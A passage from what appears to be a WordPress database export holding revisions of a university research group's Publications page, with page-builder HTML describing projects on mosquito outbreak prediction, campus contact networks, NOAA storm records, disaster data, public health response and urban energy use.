Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\r\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Research','','inherit','closed','closed','','608-revision-v1','','','2023-09-29 10:16:14','2023-09-29 14:16:14','',608,'https://gsudice.dataconn.net/?p=1422',0,'revision','',0),(1423,1,'2023-09-29 10:17:51','2023-09-29 14:17:51','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">The DICE Data Repository </h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\r\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\r\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \r\n <br>\r\n </p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\r\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Orpheus</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\r\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\r\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\r\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\r\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</div>','Publications','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:17:51','2023-09-29 14:17:51','',126,'https://gsudice.dataconn.net/?p=1423',0,'revision','',0),(1424,1,'2023-09-29 10:18:03','2023-09-29 14:18:03','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\r\n <!---->\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-339 style-local-126-c2 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-340 style-local-126-c3 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-341-outer style-local-126-c4-outer\">\r\n <div data-colibri-id=\"126-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-341 style-local-126-c4 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c5\" class=\"h-global-transition-all h-heading style-342 style-local-126-c5 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-342 style-local-126-c5\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">AeMos: An Early Warning Systems for Aedes Mosquito Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c6\" class=\"h-text h-text-component style-344 style-local-126-c6 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that\r\n are favorable for mosquito population growth. Predicting these outbreaks early is essential to positioning supplies in order to help those who will be infected. There currently lacks an Early Warning Systems (EWSs) in many parts\r\n of the globe that would heavily benefit from one. We endeavor to create an EWS that is applicable to estimate Aedes mosquito population spikes wherever there are Aedes mosquitoes.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-345-outer style-local-126-c7-outer\">\r\n <div data-colibri-id=\"126-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-345 style-local-126-c7 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\r\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\r\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">GSU Contact Network Prediction</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, and hybrid is similar to our approach to\r\n this research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\r\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\r\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\r\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\r\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n <!---->\r\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\r\n <!---->\r\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\r\n <!---->\r\n <!---->\r\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\r\n </div>\r\n </div>\r\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\r\n <!---->\r\n <!---->\r\n <div class=\"\">\r\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\r\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\r\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\r\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\r\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"h-section-grid-container h-section-fluid-container\">\r\n <!---->\r\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\r\n <!---->\r\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\r\n <!---->\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\r\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\r\n <!---->\r\n <!---->\r\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n <!---->\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\r\n <div 